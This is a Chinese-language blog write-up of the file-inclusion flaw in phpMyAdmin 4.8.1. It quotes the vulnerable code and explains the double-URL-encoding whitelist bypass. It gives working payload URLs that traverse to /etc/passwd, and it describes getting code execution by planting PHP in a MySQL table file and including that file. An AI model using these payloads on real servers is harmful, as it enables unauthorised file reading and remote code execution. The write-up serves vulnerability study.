溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

phpmyadmin 4.8.1任意文件包含的示例分析

發(fā)布時(shí)間:2021-11-12 11:25:03 來(lái)源:億速云 閱讀:133 作者:小新 欄目:安全技術(shù)

這篇文章給大家分享的是有關(guān)phpmyadmin 4.8.1任意文件包含的示例分析的內(nèi)容。小編覺(jué)得挺實(shí)用的,因此分享給大家做個(gè)參考,一起跟隨小編過(guò)來(lái)看看吧。

phpmyadmin 4.8.1任意文件包含

0x00 phpmyadmin簡(jiǎn)述

phpMyAdmin 是一個(gè)以PHP為基礎(chǔ),以Web-Base方式架構(gòu)在網(wǎng)站主機(jī)上的MySQL的數(shù)據(jù)庫(kù)管理工具,讓管理者可用Web接口管理MySQL數(shù)據(jù)庫(kù)。借由此Web接口可以成為一個(gè)簡(jiǎn)易方式輸入繁雜SQL語(yǔ)法的較佳途徑,尤其要處理大量資料的匯入及匯出更為方便。其中一個(gè)更大的優(yōu)勢(shì)在于由于phpMyAdmin跟其他PHP程式一樣在網(wǎng)頁(yè)服務(wù)器上執(zhí)行,但是您可以在任何地方使用這些程式產(chǎn)生的HTML頁(yè)面,也就是于遠(yuǎn)端管理MySQL數(shù)據(jù)庫(kù),方便的建立、修改、刪除數(shù)據(jù)庫(kù)及資料表。也可借由phpMyAdmin建立常用的php語(yǔ)法,方便編寫網(wǎng)頁(yè)時(shí)所需要的sql語(yǔ)法正確性。

0x01 影響版本

phpmyadmin 4.8.1
之前的版本沒(méi)有測(cè)試
注:需要登錄phpmyadmin才可利用

0x02漏洞分析

查看index.php 55~63行代碼

if (! empty($_REQUEST['target'])
    && is_string($_REQUEST['target'])
    && ! preg_match('/^index/', $_REQUEST['target'])
    && ! in_array($_REQUEST['target'], $target_blacklist)
    && Core::checkPageValidity($_REQUEST['target'])
) {
    include $_REQUEST['target'];
    exit;
}

條件為真(條件):

  1. $_REQUEST['target'] 不能為空

  2. $_REQUEST['target'] 是字符串

  3. $_REQUEST['target'] 不能以index開(kāi)頭

  4. $_REQUEST['target'] 不能在$target_blacklist;而$target_blacklist = array ('import.php', 'export.php');

  5. 需要滿足Core::checkPageValidity($_REQUEST['target'])

Core::checkPageValidity($_REQUEST['target']),查看phpMyAdmin1\libraries\classes\core.php
checkPageValidity 函數(shù)具體代碼:

public static function checkPageValidity(&$page, array $whitelist = [])
    {
        if (empty($whitelist)) {
            $whitelist = self::$goto_whitelist;
        }
        if (! isset($page) || !is_string($page)) {
            return false;
        }

        if (in_array($page, $whitelist)) {
            return true;
        }

        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        $_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        return false;
    }

出現(xiàn)問(wèn)題的代碼:

$_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

在請(qǐng)求的鏈接中包含%253即可繞過(guò),那可以構(gòu)造的鏈接有:
db_sql.php%253/../../../../../../etc/passwd
db_sql.php可以替換成一下:

'db_datadict.php',
        'db_sql.php',
        'db_events.php',
        'db_export.php',
        'db_importdocsql.php',
        'db_multi_table_query.php',
        'db_structure.php',
        'db_import.php',
        'db_operations.php',
        'db_search.php',
        'db_routines.php',
        'export.php',
        'import.php',
        'index.php',
        'pdf_pages.php',
        'pdf_schema.php',
        'server_binlog.php',
        'server_collations.php',
        'server_databases.php',
        'server_engines.php',
        'server_export.php',
        'server_import.php',
        'server_privileges.php',
        'server_sql.php',
        'server_status.php',
        'server_status_advisor.php',
        'server_status_monitor.php',
        'server_status_queries.php',
        'server_status_variables.php',
        'server_variables.php',
        'sql.php',
        'tbl_addfield.php',
        'tbl_change.php',
        'tbl_create.php',
        'tbl_import.php',
        'tbl_indexes.php',
        'tbl_sql.php',
        'tbl_export.php',
        'tbl_operations.php',
        'tbl_structure.php',
        'tbl_relation.php',
        'tbl_replace.php',
        'tbl_row_action.php',
        'tbl_select.php',
        'tbl_zoom_select.php',
        'transformation_overview.php',
        'transformation_wrapper.php',
        'user_password.php',

phpmyadmin 4.8.1任意文件包含的示例分析

0x03通過(guò)文件包含獲取webshell

前提條件首先知道數(shù)據(jù)庫(kù)的路徑

查看當(dāng)前數(shù)據(jù)庫(kù)的路徑:

show variables like 'datadir'

phpmyadmin 4.8.1任意文件包含的示例分析
我新建了一個(gè)數(shù)據(jù)庫(kù) tt,在tt數(shù)據(jù)庫(kù)中添加一個(gè)了表,在表中插入了<?php phpinfo()?>
然后訪問(wèn):http://localhost/phpMyAdmin1/index.php?target=db_sql.php%253f/../../../../../../phpStudy/MySQL/data/tet/tt.MYD
phpmyadmin 4.8.1任意文件包含的示例分析

感謝各位的閱讀!關(guān)于“phpmyadmin 4.8.1任意文件包含的示例分析”這篇文章就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助,讓大家可以學(xué)到更多知識(shí),如果覺(jué)得文章不錯(cuò),可以把它分享出去讓更多的人看到吧!

向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI